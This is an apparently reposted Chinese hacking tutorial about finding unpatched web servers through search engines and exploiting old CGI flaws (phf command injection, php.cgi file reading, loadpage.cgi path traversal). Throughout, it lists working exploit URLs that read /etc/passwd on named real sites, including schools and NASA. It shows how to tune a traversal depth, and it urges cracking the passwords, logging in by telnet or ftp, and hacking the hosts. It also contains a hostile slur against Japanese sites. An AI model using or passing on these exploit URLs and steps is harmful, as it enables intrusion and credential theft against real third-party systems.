我的第一篇关于ＵＮＩＸ的教程，我想说的除了找第一个帐号外,还有一个－－－灵活利用资源。
　　
　　
　　你也许会感到奇怪，这个＂灵活利用资源＂和ＵＮＩＸ有什么关系啊？
　　
　　是的，的确没什么很大的关系。
　　
　　但这是我的经验介绍。
　　
　　灵活的利用现有的资源，我们做事才能达到事半功倍的效果。
　　
　　
　　也许，你仍然不明白我的意思。
　　
　　别急．跟着我来。
　　
　　：）
　　
　　
　　相信大家都知道那个著名的漏洞吧：phf
　　
　　漏洞描述： 在NCSA 或者 Apache (1.1.1版本以内)非商业版本的Web Server中有一段程序util.c,允许黑客以root身份执行任何一个指令
　　
　　http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
　　
　　http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
　　
　　这是四年前的的漏洞了，我们现在还能找到他吗?
　　
　　答案是：
　　
　　当然可以！：）
　　
　　http://www.mohall.k12.nd.us/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
　　
　　这就是一个。
　　
　　大家可以看看，没shadow的密码档。 不错吧。依密码档看来，这个网站不是很大。
　　
　　再看一个。
　　
　　http://www.grex.org/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
　　
　　够肥的鸡吧。2395个用户，faint......
　　
　　大家找个软件慢满跑，小榕的乱刀还挺不错的。
　　
　　这个漏洞可以直接远程执行命令的哦，详细情况大家看《一次80端口的入侵》这篇文章。
　　
　　找到用户密码后，你也可以telent或者ftp上去看看哦。
　　
　　要不干脆黑了它。
　　
　　呵呵
　　
　　不过，我是不会干的。
　　
　　
　　大家感到奇怪吗？
　　
　　都什么年代了，还有这个漏洞。
　　
　　我是怎么找出来的呢？
　　
　　别急
　　
　　等一下告诉你。
　　
　　
　　名字：php.cgi 2.0beta10或更早版本
　　
　　描述：包括缓存溢出漏洞，还有导致任何系统文件可以被入侵者以nobody权限读取的漏洞。
　　
　　http://www.victim.com/cgi-bin/php.cgi?/etc/passwd php.cgi2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd　　/etc/security/passwd等.
　　
　　
　　这个漏洞大家也很熟悉吧，也很老了。
　　
　　我们一样可以找到有这个漏洞的主机。
　　
　　http://hellas.me.ntou.edu.tw/cgi-bin/php.cgi?/etc/passwd
　　
　　：）一个台湾的家伙。
　　
　　http://www.pcsc.net/cgi-bin/php.cgi?/etc/passwd
　　
　　不知道什么网站。
　　
　　http://www.ccchubu.co.jp/cgi-bin/php.cgi?/etc/passwd
　　
　　日本鬼子，他妈的，我们冲上去给他们两脚！
　　
　　大家还要吗？
　　
　　http://www.lifesupportal.com/cgi-bin/php.cgi?/etc/passwd
　　
　　http://www.ub.fu-berlin.de/cgi-bin/php.cgi?/etc/passwd
　　
　　http://www.compfutures.com/cgi-bin/php.cgi?/etc/passwd
　　
　　http://edu.larc.nasa.gov/cgi-bin/php.cgi?/etc/passwd
　　
　　http://edu.larc.nasa.gov/cgi-bin/php.cgi?/etc/passwd
　　
　　
　　这个php.cgi漏洞只能读文件。
　　
　　我们还是用乱刀来跑密码吧。
　　
　　找到用户密码后，你也可以telent或者ftp一下哦。
　　
　　
　　我又是怎么找出来的呢？
　　
　　别急
　　
　　等一下告诉你。
　　
　　
　　名字：loadpage.cgi
　　
　　描述：可以用来查看任意文件,首先用浏览器找到当前路径，
　　
　　http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ 这时可能会返回一个错误信息： Cannot open file /home/www/shop/XYZ
　　
　　现在可以替换为下面的格式，
　　
　　http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../<路径>/<文件名>
　　
　　具体如下：
　　
　　http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd
　　
　　
　　大家看看：
　　
　　http://www.valueindia.com.au/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
　　
　　哦，他妈的，@#$%@$@#%$!~……
　　
　　前几天我还可以看到密码档的。
　　
　　现在可能打上补丁了，或者删掉了，要不就被防火墙过滤了。
　　
　　我靠，我们来看看另一个。
　　
　　http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd
　　
　　嗯，为什么是500错误？
　　
　　漏洞手册上是这样的啊。
　　
　　呵呵
　　
　　我们要灵活应用嘛，是路径问题。
　　
　　我们改成：http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../etc/passwd
　　
　　Cannot open file /usr/local/etc/httpd/htdocs/bigfivestuff/store//../../etc/passwd
　　
　　？？
　　
　　还是路径问题。
　　
　　我们的路径不够深入。
　　
　　当前目录是在：/usr/local/etc/httpd/htdocs/bigfivestuff/store/
　　
　　/../../etc/passwd只向上跳两层。
　　
　　也就是在/usr/local/etc/httpd/htdocs/
　　
　　还有五层目录。
　　
　　我们就添加五层"../"
　　
　　http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../etc/passwd
　　
　　大家看到了吗？
　　
　　密码档
　　
　　不过是shadow了的。
　　
　　我们一样可以用流光生成用户列表然后ＦＴＰ简单探测。
　　
　　：）
　　
　　大家还要吗？
　　
　　http://qtb.com/cgi-bin/loadpage.cgi?user_id=1&file=../../../../etc/passwd
　　
　　http://www.bigfivestuff.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
　　
　　http://www.cheapcellphones.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
　　
　　http://www.boutiquesensuale.net/cgi-bin/loadpage.cgi?user_id=1&file=../../../../etc/passwd
　　
　　http://www.patches3.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
　　
　　http://www.topten.it/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
　　
　　http://www.palmcentre.co.uk/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
　　
　　http://www.storefinder.com/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd
　　
　　
　　够你晕了吧
　　
　　一大堆密码档
　　
　　我来说说我是怎么找到的吧。
　　
　　：）我们进入http://www.google.com/　（一个很不错的搜索引擎）
　　
　　当然你也可以用http://www.yahoo.com
　　
　　在输入框里我们输入　/cgi-bin/phf　然后回车
　　
　　我们会发现类似如下内容的页面。
　　
　　已向英特网搜索/cgi-bin/phf. 共约有7,320项查询结果，这是第1-10项 。搜索用时0.08秒。
　　
　　类别: Regional > North America > ... > DOE National Laboratories > Ames Laboratory
　　
　　Untitled
　　
　　lcweb.loc.gov/cgi-bin/phf/ - 类似网页
　　
　　Untitled
　　
　　lcweb.loc.gov/cgi-bin/phf - 类似网页
　　
　　Ames Phone Book - People
　　
　　类别: Regional > North America > ... > DOE National Laboratories >
　　
　　Ames Laboratory
　　
　　ph.iastate.edu/cgi-bin/phf - 类似网页
　　
　　
　　这些网站都有/cgi-bin/phf
　　
　　也就有可能他们的版本刚好是有上面的漏洞的那个，而没有打补丁！
　　
　　我们试试http://xxx.xxxxxxxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
　　
　　不行就试试搜索/cgi-bin/php.cgi /cgi-bin/loadpage.cgi
　　
　　当然你也可以试其他类似的漏洞。
　　
　　互连网这么大，总是能找到有的！
　　
　　但我们这样做太笨了点。
　　
　　毕竟这不是新漏洞，要找到一个能用的太难了。
　　
　　但我们为什么不想想？
　　
　　如果新发现什么漏洞可以直接读取文件或者运行命令的，我们一样可以用搜索引擎来找到有这个漏洞的主机啊。
　　
　　为什么三年前的漏洞我们还能看到呢？
　　
　　就象每个人都不一样，当然并不是每个网管都很负责的。：）
　　
　　还有，如果你有什么漏洞不懂，或者你要找什么资料软件等，也一样可以利用搜索引擎来找！
　　
　　比如，我们对twwwscan 的扫描结果：Frontpage98 Hole(_vti_inf.html) 不了解，我们就可以在搜索引擎里输入_vti_inf.html，你肯定可以找到很多相关的文章和资料的。
　　

文章转载地址：http://www.cnpaf.net/Class/hack/06101110491599246920.html